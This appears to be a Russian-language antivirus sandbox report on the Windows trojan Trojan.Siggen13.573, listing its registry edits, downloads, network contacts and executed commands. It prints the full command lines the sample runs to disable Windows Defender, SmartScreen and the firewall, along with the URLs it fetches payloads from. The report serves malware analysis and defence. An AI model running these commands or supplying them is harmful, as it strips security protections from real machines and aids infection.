Trojan.Siggen13.573

Техническая информация

Для обеспечения автозапуска и распространения

Устанавливает следующие настройки сервисов

[<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'

Вредоносные функции

Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра

[<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
[<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'

Запускает на исполнение

'<SYSTEM32>\taskkill.exe' /im smartscreen.exe /f

Загружает

https://raw.githubusercontent.com/swagkarna/bypass-tamper-protection/main/nsudo.exe as .\nsudo.exe
https://tkit-assyifa.sch.id/wp-content/plugins/elementor/modules/usage/injector.exe as injector.exe

Изменения в файловой системе

Создает следующие файлы

%TEMP%\66ec.tmp\66fd.bat
nul

Сетевая активность

Подключается к

'ra#.####ubusercontent.com':443
'tk####ssyifa.sch.id':443

TCP

'ra#.####ubusercontent.com':443
'tk####ssyifa.sch.id':443

UDP

DNS ASK ra#.####ubusercontent.com
DNS ASK tk####ssyifa.sch.id

Другое

Ищет следующие окна

ClassName: '' WindowName: ''

Создает и запускает на исполнение

'<SYSTEM32>\cmd.exe' /c "%TEMP%\66EC.tmp\66FD.bat <Полный путь к файлу>"' (со скрытым окном)

Запускает на исполнение

'<SYSTEM32>\cmd.exe' /c "%TEMP%\66EC.tmp\66FD.bat <Полный путь к файлу>"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -ScanScheduleDay 8"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -SevereThreatDefaultAction 6"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -LowThreatDefaultAction 6"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -ModerateThreatDefaultAction 6"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -MAPSReporting 0"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -SubmitSamplesConsent 2"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableScriptScanning $true"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableArchiveScanning $true"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisablePrivacyMode $true"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableIOAVProtection $true"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableBehaviorMonitoring $true"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableRealtimeMonitoring $true"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -PUAProtection disable"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Add-MpPreference -ExclusionExtension ".exe""
'<SYSTEM32>\icacls.exe' "<SYSTEM32>\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
'<SYSTEM32>\icacls.exe' "<SYSTEM32>\smartscreen.exe" /reset
'<SYSTEM32>\takeown.exe' /f "<SYSTEM32>\smartscreen.exe" /a
'<SYSTEM32>\cacls.exe' "<SYSTEM32>\config\system"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "netsh advfirewall set allprofiles state off"
'<SYSTEM32>\netsh.exe' advfirewall set allprofiles state off